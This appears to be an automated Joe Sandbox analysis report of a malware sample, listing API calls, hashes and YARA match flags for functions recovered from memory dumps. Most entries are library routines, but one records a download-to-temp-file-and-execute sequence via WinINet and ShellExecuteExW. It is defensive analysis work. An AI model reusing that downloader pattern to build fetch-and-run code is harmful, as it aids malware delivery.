                                                                                                                                                                                                                                                                • String ID: gya
                                                                                                                                                                                                                                                                • API String ID: 2545303185-1989253062
                                                                                                                                                                                                                                                                • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$Info
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                • Instruction ID: 5e1dfd718b7591f1d46bb441e6ccfc8cf8dd2dd5689df997bbd09cf117d9b2ec
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42B18E71A002099FDB22DFB9C890BEEBBF5BF18304F14456EE4A5A7341D775A841DB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$Info
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 024BA8A3
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C0F
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C21
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C33
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C45
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C57
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C69
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C7B
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C8D
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9C9F
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CB1
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CC3
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CD5
                                                                                                                                                                                                                                                                  • Part of subcall function 024B9BF2: _free.LIBCMT ref: 024B9CE7
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA898
                                                                                                                                                                                                                                                                  • Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
                                                                                                                                                                                                                                                                  • Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA8BA
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA8CF
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA8DA
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA8FC
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA90F
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA91D
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA928
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA960
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA967
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA984
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA99C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                                                                                • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                • Instruction ID: 92d23df85c1984dc914b7e8637133f71fc969108bfee2958722c8502051df644
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D317C316002109FEB32AF3AD844BDBB7E9AF04750F15486FE449D7750DB71A851EA74
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                                                                                                                                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A631
                                                                                                                                                                                                                                                                  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A653
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A668
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A673
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A695
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A6A8
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A6B6
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A6C1
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A6F9
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A700
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A71D
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A735
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                                                                                • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                                • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02482C7E
                                                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02482C94
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000105,?), ref: 02482CB0
                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02482CC6
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02482CFF
                                                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02482D3B
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02482D58
                                                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 02482DCF
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00008000), ref: 02482DE4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                                                                • API String ID: 838076374-4251816714
                                                                                                                                                                                                                                                                • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                                                • Instruction ID: dfc0e9ab0bee59850993c5f6ec385f4a29eda9a922dcd16b32129501a44d6022
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA41437190025DAEEB20DF659C85FEA77FCFF05745F0080E6A545A2150DF709E858FA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0249F228,00000004,02497D87,00000004,02498069), ref: 0249EEF9
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000,?), ref: 0249EF05
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000), ref: 0249EF15
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00447430), ref: 0249EF2B
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF41
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF58
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF6F
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF86
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF9D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                • String ID: advapi32.dll
                                                                                                                                                                                                                                                                • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                • Instruction ID: ae1f1b908bb710a69dc326704798a663ad78eb0d77ed836575b414cbbd08f05a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 882141B6904611BFEB10AFB49C08E5ABFA8EF05B16F004A2BF555D3650DBBC94418FA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0249F228,00000004,02497D87,00000004,02498069), ref: 0249EEF9
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000,?), ref: 0249EF05
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,0249F228,00000004,02497D87,00000004,02498069,?,02498799,?,00000008,0249800D,00000000,?,?,00000000), ref: 0249EF15
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00447430), ref: 0249EF2B
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF41
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF58
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF6F
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF86
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0249EF9D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                • String ID: advapi32.dll
                                                                                                                                                                                                                                                                • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                • Instruction ID: 6bb739f46a4a403fbf10ae7054893b96a74a4733b720baee6ff1b43ea12858a0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A2181B2904711BFEB10AF649C08E5ABFECEF05B16F004A2BF555D3600DBBC94418BA8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0249670B), ref: 024924B6
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024924C4
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024924D2
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0249670B), ref: 02492500
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02492507
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,0249670B), ref: 02492522
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,0249670B), ref: 0249252E
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492544
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02492552
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                • String ID: kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                • Instruction ID: d2f11704ab62b6b290706afb9712ea2c6399a1e213f3ede4b01012700adeb202
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 231186759013117FEB11BB756C5996B7FAC9D45B12710052BB801E2251EBB4D5008A69
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                                                                                                                                                                                                                  • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                                • String ID: pContext$switchState
                                                                                                                                                                                                                                                                • API String ID: 3151764488-2660820399
                                                                                                                                                                                                                                                                • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                                                                                                                                                                                • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                                                                                                                                                                                  • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                                                                                                                                                                                  • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004197B9
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: eventObject
                                                                                                                                                                                                                                                                • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                                                • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 024954B0
                                                                                                                                                                                                                                                                  • Part of subcall function 02494EC1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 02494ED5
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 024954D9
                                                                                                                                                                                                                                                                  • Part of subcall function 0249333B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02493357
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02495500
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 024953BA
                                                                                                                                                                                                                                                                  • Part of subcall function 0249339F: __EH_prolog3_GS.LIBCMT ref: 024933A6
                                                                                                                                                                                                                                                                  • Part of subcall function 0249339F: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 024933B5
                                                                                                                                                                                                                                                                  • Part of subcall function 0249339F: GetProcessAffinityMask.KERNEL32(00000000), ref: 024933BC
                                                                                                                                                                                                                                                                  • Part of subcall function 0249339F: GetCurrentThread.KERNEL32 ref: 024933E4
                                                                                                                                                                                                                                                                  • Part of subcall function 0249339F: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 024933EE
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 024953DB
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02495412
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02495455
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02495548
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0249556C
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02495579
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 64082781-0
